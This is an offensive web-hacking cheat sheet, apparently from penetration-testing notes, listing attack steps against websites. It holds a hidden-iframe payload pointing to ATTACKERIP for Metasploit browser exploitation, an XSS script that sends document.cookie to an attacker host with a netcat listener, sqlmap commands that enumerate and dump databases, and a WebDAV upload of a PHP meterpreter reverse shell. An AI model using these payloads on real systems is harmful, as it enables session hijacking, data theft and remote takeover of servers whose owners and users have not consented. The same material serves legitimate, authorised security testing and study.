WEB HACKING

• All in on web tool:- http://yehg.net/lab/pr0js/misc/wsa.php?q
• Via XSS:-
• Exploiting the browser:-
• setup metasploit auxiliary/server/browser_autopwn to listen for connection
• post an IFrame tag on vulnerable site: <iframe SRC="http://ATTACKERIP/URIPATH" height = "0" width ="0">
• Stealing Session cookies:- 
• setup a netcat listener: nc -lvp80
• Steal session cookies with the following: <script> new Image().src="http://ATTACKERIP/bogus.php?output="+document.cookie; </script> 
•  Bypassing Filters:- 
• XSS Bypass Cheat Sheet 

• Exploiting POST XSS:- http://www.net-security.org/dl/articles/AdvancedXSS.pdf

• Via SQL Injection:-
• Via GET
• show databases: ./sqlmap -u http://www.example.com/index.php?id=1 --dbs
• show tables: ./sqlmap -u http://www.example.com/index.php?id=1 -D <database> --tables
• show data: ./sqlmap -u http://www.example.com/index.php?id=1 --D <database_name> -T <table_name> --dump
• Via POST
• show databases: ./sqlmap -u http://www.example.com/logon.asp --data "user=&pass=&submit=" --dbs
• Via WEBDAV:-
• Download and run ryan linn's webdav test from here
• ./davtest.pl -url http://www.example.com/ -sendbd auto
• create a payload in an allowed format ie php: msfpayload php/meterpreter/reverse_tcp LHOST=ATTACKERIP R | msfencode -o meterpreter.php
start a metasploit reverse handler
• upload the malicious payload to the target server via ftp,ssh,php,webdav (dave),rfi etc.
• browse to the file http://target/meterpreter.php